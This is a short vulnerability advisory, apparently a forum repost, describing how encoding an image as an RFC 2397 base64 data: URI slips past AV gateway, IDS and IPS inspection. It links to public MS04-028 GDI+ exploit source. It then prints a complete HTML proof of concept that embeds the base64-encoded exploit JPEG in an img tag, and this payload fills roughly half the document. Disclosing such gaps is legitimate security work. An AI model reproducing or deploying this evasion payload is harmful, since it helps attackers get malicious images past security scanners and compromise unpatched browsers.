Multi-vendor AV gateway image inspection bypass vu

[Mobo]

A vulnerability has been discovered which allows a remote attacker to bypass anti-virus (as well other security technologies such as IDS and IPS) inspection of HTTP image content.

By leveraging techniques described in RFC 2397 for base64 encoding image content within the URL scheme. A remote attacker may encode a malicious image within the body of an HTML formatted document to circumvent content inspection.

For example:

http://www.k-otik.com/exploits/09222...4-28-cmd.c.php

The source code at the URL above will by default create a JPEG image that will attempt (and fail without tweaking) to exploit the Microsoft MS04-028 GDI+ vulnerability. The image itself is detected by all AV gateway engines tested (Trend, Sophos and McAfee), however, when the same image is base64 encoded using the technique described in RFC 2397 (documented below), inspection is not performed and is delivered and rendered by the client.

While Microsoft Internet Explorer does not support the RFC 2397 URL scheme; Firefox, Safari, Mozilla and Opera do and will render the data and thus successfully execute the payload if the necessary OS and/or application patches have not been applied.

## BEGIN HTML ##

<html>
<body>
<img
src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//
gAA**hpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw/X9BQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/bAE
MACAYGBwYFCAcHBwkJCAoMFA0MCwsMGRITDxQdGh8eHRocHC
AkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv/bAEMBCQkJDAs
MGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyM jIyMjIy
MjIyMjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/xAAfA
AABBQEBAQEBAQAAAAAAAAAAAQIDBAUGBwgJCgv/xAC1EAACA
QMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGRo
QgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREV G
R0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5eoOEhYaHiImKkp O
UlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1 d
bX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/xAAfAQADAQEBAQEBAQ
EBAAAAAAAAAQIDBAUGBwgJCgv/xAC1EQACAQIEBAMEBwUEBAA
BAncAAQIDEQQFITEGEkFRB2FxEyIygQgUQpGhscEJIzNS8BVic tEK
FiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWm
NkZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Sl pqe
oqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2dri4+Tl5ufo6 ery8/T
19vf4+fr/2gAMAwEAAhEDEQA/APn+iiigD//Z">
</body>
</html>

## END HTML ##

Solution:
While AV vendor patches are not yet available, fixes for all currently known image vulnerabilities are and have been for several months. If you have not yet applied them, you have your own negligence to blame.